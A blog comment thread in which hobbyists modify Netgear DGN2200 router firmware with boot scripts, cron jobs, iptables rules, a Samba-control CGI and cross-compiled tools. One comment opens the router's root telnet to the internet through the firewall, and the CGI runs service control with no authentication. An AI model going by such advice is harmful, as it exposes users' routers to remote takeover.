I have realised that we can easily add to the web frontend as we can write into /www/

If we remount using
<br /> mount -n -o remount,rw /<br />

Then we can make our own cgi using shell scripts. If you have the toolchain then could also do it in C but ash is good for most things. As an example if you make a file called samba.cgi an save it in /www/

`
#!/bin/sh

startSamba() {
/sbin/smbd -D > /dev/null 2>&1
/sbin/nmbd -D > /dev/null 2>&1
}

stopSamba() {
/sbin/killall smbd
/sbin/killall nmbd
while /sbin/ps aux | /sbin/grep -v grep | /sbin/grep -q 'smbd' ; do
/sbin/sleep 1
done
}

echo "Content-type: text/html"
echo ""

case $QUERY_STRING in
*samba=start*)
startSamba
;;
*samba=stop*)
stopSamba
;;
*samba=restart*)
stopSamba
startSamba
;;
esac

echo "Samba is "
if /sbin/ps aux | /sbin/grep -v grep | /sbin/grep -q 'smbd'
then
echo 'running'
start="disabled"
restart=""
stop=""
else
echo 'not running'
start=""
restart="disabled"
stop="disabled"
fi
echo "

Choose action:
Start
Restart
Stop

"

exit 0
`

You can then browse to http://IPofYourRouter/samba.cgi

You will get a very simple page that tells you if samba is running and lets you start, stop or restart it.

I intend to make myself a page which lets me start and stop samba but also shows all external drives and partitions and lets me mount/unmount them. This is all possible without other dependencies. The only thing I won’t be able to do is show the filesystem of an unmounted drive. The best way to find this would be the file command but it is not on the router.

Will share when done but maybe others can think of ways to add interesting web based controls.

Stuart

• Stuart on 2013-03-14 07:45:23 +0100

The comments system is eating the HTML code in the script. TTo see the script properly check here:

• Federico Pellegrin on 2013-03-14 07:48:39 +0100

Hey Stuart,
Thanks for the great feedback!

I’ll see if I can prepare the file or some simillar tool (like blkid or so) for the DGN so you can also give informations about umounted devices as you say!

Ciao.
F.

• Kapil Oberoi on 2013-04-02 18:02:49 +0100

Excellent work !! I’ve been trying to compile nmap for my WNR3500LV2 but in vain. Did you ever tried to compile nmap as no matter which tutorial I follow, the toolchain cannot be compiled 🙁

TY

• Federico Pellegrin on 2013-04-02 21:31:56 +0100

Hello,
Well nmap is quite a nice beast! With libpcap and expecially liblua as a dependancy is quite problematic with the uClinux based toolchain.

If a version without the lua extension is fine for you then you can find now one working one here: nmap-6.25-nolua-dgn2200-bin.tar.gz.

Decompress it where you like then since it needs also the libpcap library either put it in a library directory or use it with the LD_LIBRARY_PATH variable, ie:

LD_LIBRARY_PATH=. ./nmap -v

Also given the limited uClibc you cannot use the epoll engine so append a --nsock-engine poll to your classic command line. (or otherwise select)

To compile it without LUA there is this bug to be aware eventually.

Hope it helps! For a fully featured lua version some more time and patience would be needed 😉

ciao!
F.

• ingamedeo on 2013-04-03 16:20:27 +0100

Hi 🙂 Yesterday I flashed this router with the new firmware, but now all light are on and recovery mode doesn’t work! 🙁

And suggestions about how to recover the router and have it working again?

Perhaps something like JTAG?

• Federico Pellegrin on 2013-04-03 16:45:55 +0100

Hi,
Switch off the router, then keep the reset button pressed and power on the router. If the leds start blinking (like when you do web upgrade) it may be recoverable since it goes in flashing mode.

Then get this program here for Windows XP (some report troubles with 7 and later) and use this firmware here with the program to flash it (copy dgn2200v3.bin inside the utility directory). The program is originally for the DGN834 but works also with the 2200.

Connect to the ethernet port, when the router is in the blinking state start the program and have a lot of patience for the operation to finish. There is a little guide inside the ZIP file, just be sure you put the right firmware as linked.

Hope it helps!

Otherwise you could get out the serial / JTAG but it’s quite a longer road.

Ciao,
F.

• kapil Oberoi on 2013-04-03 17:48:56 +0100

Much appreciated !!!!!
I’ll be using the – nmap-6.25-nolua-dgn2200-bin.tar.gz as advised by you. But to use this do we have to shift from the original netgear firmware to tomato and dd-wrt??

My apologies for being so demanding but your help would be once again highly appreciated 😀

• Federico Pellegrin on 2013-04-03 18:10:22 +0100

The package is for the standard Netgear firmwares (both beta and not). It should anyway work on other simillar/alternative firmwares if the libraries are roughly simillar (and of course the architecture), give it a try eventually 🙂

Ciao!
F.

• Leo on 2013-05-05 09:23:32 +0100

Reboot DGN2200 Every day at 5:00

Thanks for all info you provide above:

I used it to set my router to reboot everyday and the steps I used are below in case someone else needs it.
Enable debug mode

URL: http://routerip/setup.cgi?todo=debug

On this router it does let you set 192.168.1.1 to respond to telnet otherwise would need to do it local

So setup firewall rules to enable telnet calls from off site

Mount system file to read and write

mount -n -o remount,rw /

change work directory and install tar, gzip and nano

cd /usr/etc

PATH=$PATH:/usr/etc

Will need to download the files on this zip to the router the router has wget installed already.

Probably upload the files to a ftp server and download from there:

the file tar and gzip need to be change to exectubles

chmod a+x tar gzip

tar xfz nano-dgn2200-bin.tar.gz

Create a folder

mkdir opt
cd opt
mkdir toolchains
cd toolchains
mkdir uclibc-crosstools-gcc-4.4.2-1
cd uclibc-crosstools-gcc-4.4.2-1
mkdir share
cd share
mkdir terminfo
cd terminfo
mkdir v
cd v

cp /usr/etc/vt102 /opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/share/terminfo/v/vt102

cd /usr/etc
nano crontab

add the line

0 5 * * * root /sbin/reboot

• kapil oberoi on 2013-05-18 07:58:50 +0100

With your inputs, I was finally able to cross-compile nmap for wnr3500lv2.

For copying the nmap generated information, I cross-compiled WPUT successfully. But the problem is that wput is not able to connect to any ftp server and says permission denied. On the ftp server there is no hit/log.

Is it something with the compilation ??? The same command works from the windows and linux system that are connected to the same router.

TY

• Federico Pellegrin on 2013-05-20 05:54:39 +0100

Hello,
I checked the code of wput and tried why doesn’t it work. The problem is that some calls return, as it should be being non-blocking, an EINPROGRESS error code but the source is checking for some *hardcoded* values and not for the EINPROGRESS define. This is of course not portable and compiler dependant!
Infact if you check the code in socketlib.c you’ll find:
if(errno > 0 && errno != 115 && errno != 36)
That is not very polite to use. You should replace it with:
if(errno > 0 && errno != EINPROGRESS)
And then it should work!
Ciao!
f.

• kapil oberoi on 2013-05-20 07:20:44 +0100

My God, you are a saviour !!!!!

Thank you very much for your time and efforts.

• kapil oberoi on 2013-05-20 11:56:56 +0100

After recompiling WPUT with – if(errno > 0 && errno != EINPROGRESS), now Im stuck at error – connecting to xxx.xxx.xxx.xxx………. failed. No matter which FTP I specify, the error in displayed instantenously.

• ninavillanueva on 2013-05-21 02:29:24 +0100

Very good article! We are linking to this great post on our
website. Keep up the great writing.

• Federico Pellegrin on 2013-05-21 07:37:38 +0100

Hello!
That is strange mmm… Are you sure there aren’t on that router some limitations to outgoing connection from the router itself?
You could try for example with another client (for example curl that is on the article to download) to see if that works. Or eventually, more technical solution, try to run WPUT with strace (also on the page above) so you see what call fails (I debugged the EINPROGRESS problem like this indeed). As for DGN2220v3 I tried WPUT on one single FTP upload and it worked. In case here is the dgn2200 version compiled wput-0.6.1-dgn2200-bin.tar.gz.
Ciao
F

• kapil oberoi on 2013-05-22 06:07:33 +0100

Hello,

I did compiled the curl and it works perfectly fine. It seems that the issue is with wput.

Thanks again for your help..

• Kapil Oberoi on 2013-06-04 13:27:25 +0100

Which application can check the amount traffic on WAN / LAN interface of netgear’s WNR3500lv2 like SHIBBY’s TOMATO “Realtime bandwidth monitoring of LAN clients” option ? We use OFW.

• Federico Pellegrin on 2013-06-04 13:34:17 +0100

Hi!
From the “low level” point of view you can use iptables accounting rules to “count” the traffic using whatever rule you prefeer (by interface, ip, port, whatever).
From the graphical side I don’t have a suggestion for you but I guess there are eventually many options if you give Google a try 🙂
Ciao!

• JCM on 2013-06-10 10:56:43 +0100

I have been following this topic and it helped me alot with my wnr3550 official firmware.

I created a script that continuously pings an address and then uploads the results to a FTP location. However, after router reset the scripts is rendered useless as the CRONTAB entry is removed.

I noticed that the default entry is created (firmware update entry) automatically. Can I somehow ensure that when the router is set to default/reset, my entry is also created automatically like the default one??? Do I have to make this change in a file in the actual firmware source code ??

Any help shall be appreciated !!

• Hemant Kapoor on 2013-06-10 17:31:43 +0100

Very valuable info (could not find this anywhere on the net, thanks for that). Now if you can help me with one more thing. I want to permanently disable AnnexM. I can disable it through DMT Tool but it turns on after reboot. “adslctl profile –save” gives adslctl profile –save
adslctl –save is only supported from Linux404 on ward

Would be nice if you could help me with this. Thanks in advance.

• Federico Pellegrin on 2013-06-11 05:26:20 +0100

Hello!
In the DGN2200V3 firmware the crontab file is regenerated by the /etc/rc_apps binary which is closed source and therefore cannot be modified. But a very easy solution is that you add a few lines of shell that gets automatically executed at boot to add your lines.

On the DGN you do this by:

1. Add in the /usr/etc/rcS file (since /etc/rcS is just a live copy) at the end a call like “/etc/rc_custom &”. This will execute rc_custom
2. Create a shell script “/usr/etc/rc_custom” in which you execute what you do manually, for example:
   <br /> #!/bin/sh<br /> sleep 30<br /> echo "10 * * * * root /usr/bin/myoperation" >> /usr/etc/crontab

The script just waits for 30 seconds (so you’re sure the system booted up totally) and then just appends the line to the crontab.
3) Make the script executble (chmod a+x /usr/etc/rc_custom)

Upon next reboot you should have your operation automatically added.

Otherwise on the DGN another solution (see some comments up) is to add your actions to the file /usr/etc/wifi_crontabs. This file has the classic crontab format and just gets appended after the other ones!

Ciao!

• Federico Pellegrin on 2013-06-11 05:28:15 +0100

Hello!
An easy solution is that you add a few lines of shell that gets automatically executed at boot to add your lines.

On the DGN you do this by:

1. Add in the /usr/etc/rcS file (since /etc/rcS is just a live copy) at the end a call like “/etc/rc_custom &”. This will execute rc_custom
2. Create a shell script “/usr/etc/rc_custom” in which you execute what you do manually, for example:

#!/bin/sh
sleep 30
adslctl ……….

The script just waits for 30 seconds (so you’re sure the system booted up totally) and then executes your commands
3) Make the script executble (chmod a+x /usr/etc/rc_custom)

Upon next reboot you should have your operation automatically added.

Ciao!

• claire_rawlings on 2013-06-11 15:53:50 +0100

Awesome post.

• Deon on 2013-06-26 09:47:29 +0100

Hi, we use the DGN2200V3 as a wireless router only. The router is working fine but we experience the following problem: the users/laptops can connect immediately to the router with limited access, ie no network/internet access BUT then it takes up to 5 minutes to get access to the network/internet? Any setting which we can change in order for “immediate” network/internet access? The LED’s are also net blinking but I notice the solution in the blog. We have another 2 Netgear wireless routers on the network and they are working fine…Thanks for your assistance…

• DonKy on 2013-06-29 18:34:51 +0100

Hi folks!!
This is the great article for dgn2200 on the net!!!

I understand many things from here but….how i can add a new service for DDNS?
I would like to add OVH that is my domain, with the service DDNS.

Can some one help me?
Thanks in advance!!!

• anthonyno on 2013-07-02 08:43:41 +0100

“considering also that there is no default editor on the system”
Firmware Version 1.1.00.21 (North America) : vi is perfectly working 🙂
To change SNR I used
#!/bin/sh
# 30 seconds are not enough for adslctl …
/bin/sleep 60
/bin/adslctl start –snr …

Bye

anthonyno

• Federico Pellegrin on 2013-07-06 09:53:56 +0100

Hello!
I’m not practical with OVH but as far as I can see for example here you could just use wget (already inside the firmware) or curl (in the download section) to call the URL that is formed as by the link, namely:

http://[USERNAME]:[PASSWORD]@www.ovh.com/nic/update?system=dyndns&hostname=[DOMAIN]&myip=[IP]

To update the DDNS info. You can put this in the rcS script executed at startup or for example in the cron list to make it executed every fixed time (check in the previous comments for how to schedule an operation with cron by using for example the wireless schedule file).

Ciao!

• Federico Pellegrin on 2013-07-06 09:55:51 +0100

Hello!
This sounds quite strange sincerely. Given the timeouts I would investigate if there is some DHCP problems (if you are using DHCP on the routers try using fixed IPs as a test) or maybe some DNS troubles (again try putting some fixed external DNS services such as OpenDNS in some test PC).

Ciao!
f.

• Basil Brooks on 2013-07-08 10:31:55 +0100

Wow…

Thanks so much I used this to fix the SNR or my DGN2200v3. With the default setting I only get around 1Mb download but when I set it with “adslctl configure –snr 50” I get 2Mb which is the max on this line.

So I used your code to do this every boot. (I used to use unix years ago so it was somewhat familiar).

I found I needed to sleep for 60 secs to make it work.

So this did the trick:

<br /> mount -n -o remount,rw /<br /> cd /usr/etc<br /> echo "/etc/rc.snr &" >> rcS<br /> echo "#!/bin/sh" > /usr/etc/rc.snr<br /> echo "/bin/sleep 60" >> /usr/etc/rc.snr<br /> echo "/usr/bin/adslctl configure --snr 50" >> /usr/etc/rc.snr<br /> chmod a+x /usr/etc/rc.snr<br />

Fantastic!! Thanks again for sharing this info!!

Basil

• Basil Brooks on 2013-07-08 10:34:43 +0100

ha ha just saw the post above, wasn’t there last time I looked, seems like it fixed for that guy as well…

• Alvin Lambert on 2013-08-01 07:14:01 +0100

Hi, nice article. I really like it!

• Prakash on 2013-08-17 04:47:21 +0100

Good Post. Learnt a lot about DGN2200v3 thru this. Thanks a lot.

A little contribution from my side. Modify the line which contains “/bin/echo 0300 > /proc/led” in /usr/etc/rcS to enable internet LED blinking.

I modified to below code for my taste.

“/bin/echo 0301 > /proc/led”

• Federico Pellegrin on 2013-08-18 06:44:26 +0100

Thanks for the hint, very interesting trick! 🙂

Ciao!
F.

• Prakash on 2013-08-23 08:08:43 +0100

Hi Federico

Just a thought can the usbserial module enable support for 3G Dongle/Modems similar to DGN2200M on DGN2200v3?

Regds

PP

• Federico Pellegrin on 2013-08-23 09:22:21 +0100

Hello!
It really depends on the 3G dongle/modem. If the modem is seen as a usb serial device then (adding the specific chipset module near) absolutely yes! Otherwise often you find such dongles using the USB ACM module or with other modules.

But definitely: I don’t see any reason why by just adding the correct module(s) you could absolutely turn the DGN2200 to the M version with just a few software tricks 😉

If you have any 3G dongle under your hand for a test (I don’t actually have any) it would be great to know, I can eventually compile some additional modules for you if you need so.

Ciao!
F.

• Prakash on 2013-08-24 08:14:12 +0100

Thanks a Federico. I do have a Huawei EC150 Dongle supplied by Reliance here. I could see it detecting the Storage part of it but not the modem. I think it didnt switch to modem mode ( from what I got from google ). Below is the dmesg output.

usb 2-1: new full speed USB device using ohci_hcd and address 2
usb 2-1: configuration #1 chosen from 1 choice
scsi1 : SCSI emulation for USB Mass Storage devices
usb-storage: device found at 2
usb-storage: waiting for device to settle before scanning
nas1: no IPv6 routers present
scsi 1:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 0
usb-storage: device scan complete
.
.
.
usbcore: registered new interface driver usbserial
usbserial: USB Serial Driver core

BTW is rtorrent working on 1.0.0.23? I am getting “Error opening terminal: vt102” error.

• Federico Pellegrin on 2013-08-30 09:49:55 +0100

For rtorrent: make sure that the vt102 terminal file definition is on the device. The file must be in /opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/share/terminfo/v/ directory. You can find the file in the “nano” package for example (it is used by termcap)

I’ll give a look the the 3G dongle ASAP and let you know! (sorry but I’ve been very busy this days)

F.

• Prakash on 2013-09-03 15:07:19 +0100

Thanks for the response Federco. I just installed amod 1.0.16 and configured transmission and its working fine now. Will leave vt102 for sometime now though I could see a file present in /usr/share/terminfo/v.

Will await your reply for the 3G dongle driver.

• Prakash on 2013-09-04 14:04:53 +0100

Hi Federico … Can you help in compiling SQUID or equivalent Proxy Caching package for DGN2200?

• Stuart Marsden on 2013-09-05 11:21:58 +0100

Hi Federico,

Thanks for all your work on this router. I got my ext external drive working nicely on my router and shared with samba (see my posts from a few months ago).

I want to be able to back files up to a shared server but my protocol options are limited. Rsync would be great but is not supported by the remote server so I need ftp. I have discovered that lftp http://lftp.yar.ru/ has a mode called mirror which works a bit like rsync over ftp.

Is it possible that you could compile lftp for our router.

Many thanks,

Stuart Marsden

• Bennie on 2013-09-06 11:49:56 +0100

Hello Federico!
We have a DGN2200 router and want to use it as a print server. However I was disappointed to find out that it doesn’t support that option. I thought of buying a LAN to USB print server, but then I encountered this article and fount out it’s possible to set up a print daemon!
However I am not very familiar with linux commands and functions. Is there an easy “how to” to install the print daemon to someone who isn’t used to linux commands?

• Federico Pellegrin on 2013-09-06 21:06:21 +0100

Hello Stuart,
I’m happy you’re using happily your router and still tweaking it 🙂

For lftp here it is! I did a few tests but not with mirror mode but hope it works (has also zlib and ssl compiled in): lftp-4.4.9-dgn2200-bin.tar.gz

In the .tar.gz you’ll find the lftp binary and two libraries that are needed for it to run. Either copy them in /lib so the system will see them automatically otherwise just put them someplace and then use the LD_LIBRARY_PATH variable.

For example if you just put all the files together in some directory run it then with:

`# LD_LIBRARY_PATH=. ./lftp –version
LFTP | Version 4.4.9 | Copyright (c) 1996-2013 Alexander V. Lukyanov

LFTP is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
...
`

Hope it works fine for your needs, let me know!

Ciao,
Federico

• Federico Pellegrin on 2013-09-06 21:40:03 +0100

Hello there!
Well Squid is a great proxy but I wouldn’t suggest it really for the DGN2200 since it’s really too resource hungry if you really don’t need some specific feature of it (of it zillions of features 🙂 ).

As a lightweight and essential alternative I’d suggest polipo which is often also associated with TOR for example. You can find more informations about it on polipo homepage and here comes also the latest version crosscompiled for the DGN2200: polipo-1.0.4.1-dgn2200-bin.tar.gz (I did a few fast tests right now and it looks fine). You can find example configuration files online by searching polipo.conf.

Ciao!

• Prakash on 2013-09-07 10:14:54 +0100

Thanks again. Works like a charm :). I have created config file under /usr/etc/polipo/, which is the default location. Below is a small script which is called at every boot to do a house keeping on the files once every 7 days or later.

``

#!/bin/sh

LASTRUNFILE="/mnt/shares/U/polipo/lastrun"
today=`date +%Y%m%d`

if [ -f $LASTRUNFILE ]
then
lastrun=`cat $LASTRUNFILE`
daysrun=`expr $today - $lastrun`
if [ $daysrun -gt 7 ]
then
pid=`ps | grep polipo | grep config | awk '{print $1}'`
kill -USR1 $pid
sleep 1
/sbin/polipo -x
kill -USR2 $pid
echo $today > $LASTRUNFILE
fi
else
echo $today > $LASTRUNFILE
fi

``

• Stuart Marsden on 2013-09-07 11:27:31 +0100

Federico,

Thank you so much for doing that so quickly. I will have a go with it in the next few days and let you know how it works.

Stuart

• Stuart Marsden on 2013-09-08 11:30:56 +0100

Only done a short test with mirror on lftp but seems to work fine. I will now look at how I set up a cron job to do a backup of my attached hard drive in the middle of the night.

Copied lftp to /bin and the libs to /lib and it works great. How do I know how much room I have left on / as df does not seem to be available?

Many thanks,

Stuart

• Stuart Marsden on 2013-09-08 11:38:04 +0100

Must have been in lftp shell when I tried df as it is on the router. I seem to have about 6MB still to use.

• Hamid on 2013-09-24 03:10:33 +0100

Hi Federico,

I really love this post, it has kept me busy for 2 month playing
with my router which I really enjoying it.

Got a question for you, hoping you might be able to help me.
I was trying to get the openvpn working on my router. I actually have done it
on another machine (Ubuntu) with port forwarding and it works with no issues.

With the DGN2200 itself, so far, I could connect to it from a windows machine
and linux machine, got the Sequence Completed message. But cannot ping anything,
not the server (private ip and local) not any others behind the firewall.

I tried every single iptables rules, but still no success.

Please let me know what I am missing.

Cheers
Hamid

• Roberto Fasiani on 2013-09-27 21:32:06 +0100

Hi Federico,
do you think it’s feasible to compile some small sip server and fit it into the dgn2200v3? the idea is to use it to control an ATA like the grandstream ht503 or cisco spa3102 without having to reply on external sip services or having to buy a fritzbox…
grazie
Roberto

• Federico Pellegrin on 2013-09-30 06:09:56 +0100

Hello Hamid!
Setting up iptables for OpenVPN is a bit “personal” since it depends really on the configuration you’re trying to setup and your network in general.

This being said the most important thing to say is to remember that you have to work on the tap0 interface since that one is used for the vpn tunnel.

As a starter that may help you at least in the very first step and first pings I’d suggest:

iptables -A INBOUND_FILTER_1 -i tap0 -s 0/0 -d 0/0 -j ACCEPT<br /> iptables -A LOCAL -i tap0 -s 0/0 -d 0/0 -j ACCEPT<br />

This should help at least to access the VPN on the server itself. Then to access other host behind it you should work on the forwarding rules (and watch out that also the machines themselves need to have proper routing setup to send the packets on the router IP).

ciao!
F.

• Federico Pellegrin on 2013-09-30 06:12:46 +0100

Ciao Roberto!
I’m sincerely no expert (not even beginner I’d say! 🙂 ) of SIP. But the idea sounds very interesting to me so if you tell me which sip server could be a good candidate for the job (keep in mind that it has to be quite slim since the resources on the DGN are limited) I can try to give a look on the crosscompilation part when I have some spare time and if the crosscompilation is successfull I’ll let you do the full testing of it!
Let me know!

Ciao!
F.

• Hamid on 2013-10-01 08:05:09 +0100

Thanks Federico,

This actually worked and now I can see the private ip of the server.
But I still cannot ping the local ip of the router therefore no other
machine in the local network.

Basically, all I want is to connect to my local network after vpn connection.

Anyway, I will dig more to see if I can make this work.

Thanks a lot for your help.

• Federico Pellegrin on 2013-10-01 08:25:40 +0100

Hello Hamid,
In this case the first thing you should look for is to push a route with openvpn. Try to search “openvpn push route” on your favourite search engine. This way you “publish” a network route on the other side of the link and therefore the other side should know where to send the packets to. Then you should poke iptables with some FORWARD rule.

I gave a fast look around and found this link that may be interesting to you since I think it describes the case you’re trying to reproduce https://community.openvpn.net/openvpn/wiki/BridgingAndRouting

Let me know! 😉

Ciao!
F.

• Roberto Fasiani on 2013-10-01 22:34:28 +0100

I am not an expert either. I’ll play with some linux sip proxies (e.g. resiprocate) but of course it needs to fit in the little space left on my DGN2200v3 (less than 9Mb)… will come back here as soon as I have a good candidate, thanks!

• Federico Pellegrin on 2013-10-02 06:56:00 +0100

Ciao Roberto!
I gave a look to resiprocate and it doesn’t seem like a viable solution since it looks quite heavy (starting by the fact that it’s written in C++). After a little bit of research I saw Kamailio which has been used on other embedded devices it seems (check here). Does it look like a good candidate to you?
When I have time I’ll in the meantime download the source and try to give it a compilation 😉

Ciao!

• Federico Pellegrin on 2013-10-03 15:28:04 +0100

Hello Roberto,
I had a little spare time and here come Kamailio in the SER flavour (should be lighter) compiled if you have time to test it. I saw that it starts and seem to work but I don’t have much experience to make a decent test sincerely. Here it is (in the whole source tree so you have all the references): kamailio-4.0.3-dgn2200bins.tar.gz

Ciao!

• Hamid on 2013-10-10 00:47:19 +0100

Hi Federico,

Thanks again for your kind reply and sorry for the relay in getting back to you.

Was terribly busy these days, finally got a chance
to try those routing rules but still no success.

I also tried tcpdump, and I can see the ICMP packets coming to the router but getting no reply.

• Raj on 2013-11-14 05:43:30 +0100

Stuart/Federico

I cannot get tar to work based on the instructions you have provided regarding getting tar & gzip to work in my netgear DGN2200v3 adsl router. What am i doing wrong? please advice. Thanks

`

pwd

/

ls -ltr tar

-rwxr-xr-x 1 root root 475980 Nov 13 20:03 tar

ls -ltr gzip

-rwxr-xr-x 1 root root 123760 Nov 13 20:03 gzip

echo $PATH

/sbin:/usr/sbin:/bin:/usr/bin

echo $PATH:/gzip/sd12

/sbin:/usr/sbin:/bin:/usr/bin:/gzip/sd12

echo $PATH:/tar/sd12

/sbin:/usr/sbin:/bin:/usr/bin:/tar/sd12

cd sd12

ls -ltr

-rw-r–r– 1 root root 190128 Nov 13 20:38 nano-dgn2200-bin.tar.gz

tar xfz nano-dgn2200-bin.tar.gz

-sh: tar: not found
`

• Federico Pellegrin on 2013-11-14 06:32:52 +0100

Raj:

You should just put the *directory* in the path and you have to use “export” to set a variable not “echo”.

Therefore if you put everything in “/” just use:

`

export PATH=$PATH:/

`

Ciao!

• Roberto Fasiani on 2013-11-15 21:09:53 +0100

Hi Federico,
thanks for compiling kamailio, unfortunately I had to abandon the project, it was getting too expensive (a good ATA was needed).
Lately I set up the DGN with ssh and rsync following your suggestions but came across another strange behaviour, or maybe not. When I add the iptables rules to reach port 22 from outside, using a dyndns service, they last for a few hours, then suddendly they disappear. I guess that that happens when Telecom Italia forces the router to disconnect and reconnect with a different IP. I guess that the DGN calls “rc_apps” which rebuilds from scratch all iptables chains wasting any change. I am not sure where I could put a script to re-add my ssh rules. Have you got a clue?

• Guido Pietrella on 2013-11-20 00:26:30 +0100

Ciao Federico,

thanks for your post, I’ve followed it to make little improvements to my router… Everything was working fine, until I update the router firmware…

Now it seems my modification script is not run after reboot, even though the correct line is at the end of the /usr/etc/rcS file.. If I manually run the script (by copying and pasting the same line in the rcS file), it works!

Would you please take a look at my configuration and check if you see any mistake?

Here is my modification file:

`

ls -la /usr/etc/GuidoMod.rc

-rwxr-xr-x 1 root root 123 Jul 25 16:38 /usr/etc/GuidoMod.rc

# cat /usr/etc/GuidoMod.rc
#!/bin/sh
/bin/sleep 20
/usr/bin/wl ledbh 3 7
/usr/bin/wl -a wl0 txpwr 160
/bin/sleep 10
/usr/bin/adslctl start --snr 25
`

And here are the last lines of my rcS file:
`

tail /usr/etc/rcS

#/bin/sleep 60
#/sbin/insmod /lib/modules/GPL_NetUSB.ko
#/sbin/insmod /lib/modules/NetUSB.ko

/bin/ps
#/bin/sleep 15
#/usr/sbin/rc check_fw start
/etc/GuidoMod.rc &
`

It seems to me that everything is correct… Is there anything missing?

Thanks in advance for your help,
Guido. 🙂

• Michele on 2013-12-15 20:55:50 +0100

Nice guide
I’m search to follow guide to do PAT on my Netgear D6200
doing it with iptables but I’m not very lucky ..

• Roberto Fasiani on 2013-12-23 18:07:45 +0100

Following Michele’s comment I can confirm that the rcS method doesn’t work anymore even on my DGN on the latest firmware V1.1.00.23_1.00.23. It looks any appended custom config isn’t executed anymore despite it’s clearly both in /usr/etc/rcS and /etc/rcS as a consequence.
Any ideas?

• Roberto Fasiani on 2013-12-23 18:33:33 +0100

I have possibly found a way to get round the issue with the latest firmware preventing from excuting any script appended to rcS.
Apparently rcS execution is stopped at some stage by a call to rc_apps, maybe when calling rc_init or “rc start”. I added a call to my script

/etc/rc.mystartup &

before the following three lines in rcS

/usr/sbin/rc_app/rc_init
/usr/sbin/ft_tool
#/usr/sbin/scfgmgr

in my script I called “/bin/sleep 60” before my custom lines

Basically the script is launched before rcS kills itself leaving the dirty job to rc_apps, but it sleeps until all the initialization has been done by rc_apps
When rebooting, after a while, my script is nicely executed.

• Prakash on 2013-12-29 10:31:51 +0100

Hi Federico

Can you help in compiling USB_ModeSwitch for DGN2200? My R&D on enabling 3G dongle support is still on and I am looking for an option which can switch the dongle mode from CDROM to Modem.

Thanks in advance.

• Prakash on 2014-01-01 18:27:00 +0100

I found out a dongle which works without any USB switching on the router. I am successful in establishing PPP connection to the ISP as well. Currently stuck with iptables. I am able to ping servers on the internet and local LAN from the router but unable to ping/browse from Local LAN. Tried to replicate the same ppp interface name but not successful. There is a new device “nas1” dynamically created during the PPPoE session over ADSL. Not sure if that is causing the problem though. Anyone can help me or point me in the right direction?

• Federico Pellegrin on 2014-01-05 08:44:15 +0100

Hello!
If it’s working from the router and not from the local LAN then most probably the NAT rules are not set up or correct. When you “copied” the iptables rules did you also check out the NAT rules? You have to put a “-t nat” in the command line, so for example:
iptables -L
gives you all the rules in the filter table while
iptables -t nat -L
gives you the nat table entries. Check out that you “mirror” also that rules.

Ciao!

• Federico Pellegrin on 2014-01-05 08:45:47 +0100

Roberto: many thanks for the solution and the update, great work! I’m using the “old” (actually totally personalized) setup so didn’t come across this trouble, but your solution and post is very precious!

• anthonyno on 2014-02-06 10:02:08 +0100

Could anybody compile the igmp proxy code for DGN2200v3 ?
This software is useful for IPTV enabling …
Source code is in http : / / sourceforge.net / projects / igmpproxy /

• anthonyno on 2014-02-06 15:27:59 +0100

… or alternatively please compile udpxy …

• Federico Pellegrin on 2014-02-06 16:28:56 +0100

Hello anthonyno,
Here comes igmpproxy, you will find the version 0.1 tarball with the compiled version inside (in src):
igmproxy-dgn2200.tar.gz

I just checked that it starts and does something, let me know if it does its job correctly!

Ciao,
Federico

• anthonyno on 2014-02-06 16:31:07 +0100

Great

Thanks

• Federico Pellegrin on 2014-02-06 16:34:01 +0100

Ciao,
And here comes udpxy-1.0.23-9

If you test it please leave a note if all works fine!

Ciao!
F.

• anthonyno on 2014-02-08 11:46:23 +0100

Server starts correctly:
<br /> 1970-01-01 00:06:01.736491 GMT S(7733) udpxy 1.0-23.9 (prod) standard [Linux 2.<br /> 6.30 mips]: udpxy -p 4022 -a group1 -m ppp1 -v -l /tmp/udpxy.log<br /> 1970-01-01 00:06:01.737273 GMT S(7733) Server is starting up, max clients = [3]<br /> 1970-01-01 00:06:01.737865 GMT S(7733) Setting up listener for [192.168.0.1:4022]<br /> 1970-01-01 00:06:01.738491 GMT S(7733) Setting low watermark for server socket [6] to [10]<br /> 1970-01-01 00:06:01.738902 GMT S(7733) Created server socket=[6], backlog=[16]<br /> 1970-01-01 00:06:01.739368 GMT S(7733) Entering server loop [pselect(2)]<br /> 1970-01-01 00:06:01.739650 GMT S(7733) Waiting for input from [2] fd's, NO timeout<br /> 1970-01-01 00:08:03.017800 GMT S(7733) No children exited since last check<br /> 1970-01-01 00:08:03.018263 GMT S(7733) Got 1 requests<br /> 1970-01-01 00:08:03.018573 GMT S(7733) Accepting new connection<br />
I have also allowed udp traffic acceptance: ( no IGMP changes because it seems it’s already enabled )
`

iptables -L INPUT

Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT udp – anywhere anywhere
INPUT_VPN all – anywhere anywhere
IGMP_INPUT all – anywhere anywhere
ACCEPT_RULES all – anywhere anywhere
DOS_DETECT all – anywhere anywhere
LOCAL all – anywhere anywhere
USB_FILTER all – anywhere anywhere
REMOTE_FILTER all – anywhere anywhere
ACCEPT udp – anywhere anywhere
But no way to get udp multicast traffic correctly working ….
1970-01-01 03:36:07.801750 GMT c(22100) Relaying traffic from socket2
to socket7, buffer size=[2048], Rmsgs=1, pauses=[0]
1970-01-01 03:37:07.802109 GMT c(22100) read_buf: socket time-out on rea
d1970-01-01 03:37:07.802466 GMT c(22100) read_data - EOF
1970-01-01 03:37:07.802729 GMT c(22100) Exited relay loop: received=[-1], sent=[0], quit=[0]
1970-01-01 03:37:07.803661 GMT c(22100) multicast-group [DROP]
`
Any suggestion is welcome !!!

• Federico Pellegrin on 2014-02-09 08:38:05 +0100

Ciao!
Be aware also of the PRE_CNAPT chain in the firewall that may be creating the problems, check the SSH port opening example in the article.

Ciao!

• anthonyno on 2014-02-09 18:54:36 +0100

Unfortunately there’s no PRE_CNAPT chain (maybe another name ?)
My original ‘iptables -L’ command output follows:
``
Chain INPUT (policy DROP)
target prot opt source destination
INPUT_VPN all – anywhere anywhere
IGMP_INPUT all – anywhere anywhere
ACCEPT_RULES all – anywhere anywhere
DOS_DETECT all – anywhere anywhere
LOCAL all – anywhere anywhere
USB_FILTER all – anywhere anywhere
REMOTE_FILTER all – anywhere anywhere

Chain FORWARD (policy DROP)
